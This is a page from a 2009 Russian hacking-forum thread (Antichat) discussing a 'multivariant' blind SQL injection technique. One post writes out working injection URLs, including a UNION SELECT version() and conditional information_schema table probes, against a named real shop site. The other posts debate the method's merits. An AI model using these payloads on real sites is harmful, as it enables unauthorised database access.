ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Multivariant Blind SQL Inject's
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 25.04.2009, 17:13
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Цитата:
Сообщение от o3,14um  
Ну во-первых, твой РЕАЛЬНОЙ пример

как-то и не работает =)

Я, конечно верю, что когда-то он работал, но посмотрим даже сейчас. Там по-видимому сделали пеерстройку и теперь проверяются переменные-результы на правильность и если хоть один из них неправильный - вылазит одибка мускуля. Ну, может там и подругому, но не суть.
мде
Этот пример до сих пор отлично работает, смотри внимательно :
5.0.19


Цитата:
Сообщение от o3,14um  
Вот вам слепая скуля
http://www.omjewels.com/cpCommerce/document.php?id_document=2-1

из багтрека
http://www.xakep.ru/post/47899/default.asp

Покажите пожалуйста на примере, этот метод...
Это тоже не слепая скуль (мои приветы автору баги )
http://www.omjewels.com/cpCommerce/document.php?id_document=-2+union+select+1,version(),3,4,5,6,7--
5.0.51a-community

Но дело конечно не в этом. Суть метода помоему ясна предельно, в зависимости от выполнения условия, результат будет разным. Т.е. если есть таблица 'admins' выведется новость 112, если 'users' 113, что тут непонятного?

=================

Конкретно на примере:
http://www.omjewels.com/cpCommerce/document.php?id_document=(select+1+from+informatio n_schema.tables+where+table_name=0x6C6F6C+union+se lect+2+from+information_schema.tables+where+table_ name=0x5649455753)

выводится новость 2 т.е.
http://www.omjewels.com/cpCommerce/document.php?id_document=2

Это происходит потому. что таблицы lol нет, а таблица VIEWS есть. Так понятно?
Последний раз редактировалось jokester; 25.04.2009 в 17:30..
 
Ответить с цитированием

  #12  
Старый 26.04.2009, 00:58
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию
Цитата:
мде
Этот пример до сих пор отлично работает, смотри внимательно :
5.0.19
а, ё =) Ну это вывод в ошибке. не всегда сработает

Цитата:
Это происходит потому. что таблицы lol нет, а таблица VIEWS есть. Так понятно?
Ога, догнал =)
Только этот метод имеет ряд недостатков...

Если 2 варианта будут верны, то ниечго не получитсяЮ да и ещё нужно смотрет что за новость...
Идея, конечно хорошая, но я, к примеру никогда не буду пользоваться этим методо=)
 
Ответить с цитированием

  #13  
Старый 26.04.2009, 01:52
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
а чем не устороила конструкция select case?
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #14  
Старый 26.04.2009, 14:27
Аватар для Psi.X
Psi.X
Познающий
Регистрация: 12.04.2009
Сообщений: 45
Провел на форуме:
122612

Репутация: 13
По умолчанию
Цитата:
Если 2 варианта будут верны, то ниечго не получится
Заверни конструкцию в еще один select с limit'ом
Цитата:
Идея, конечно хорошая, но я, к примеру никогда не буду пользоваться этим методо=)
Твое дело =) Но если есть возможность провести отаку на порядок эффективнее почему бы ей не воспользоваться
зы Метод какбе подразумевает автоматическое использование в скрипте, если не захарит, может напишу скриптег

Scipio
Не вкурсе насчет SELECT CASE, можешь просветить? Это работает только в SQL SERVER?
 
Ответить с цитированием

  #15  
Старый 26.04.2009, 16:33
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию
http://www.mysql.ru/docs/man/Control_flow_functions.html
тут про кэйс
Цитата:
Но если есть возможность провести отаку на порядок эффективнее почему бы ей не воспользоваться
помоему это не эффективнее, а просто запутанней =))
 
Ответить с цитированием

  #16  
Старый 28.04.2009, 21:15
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
О чем тема ваще? Бред. Смысл перетирать то, что уже давно написано до нас?
 
Ответить с цитированием

  #17  
Старый 28.04.2009, 23:01
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию
Цитата:
Сообщение от Pashkela  
О чем тема ваще? Бред. Смысл перетирать то, что уже давно написано до нас?
Не бред, просто не до конца проработано
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ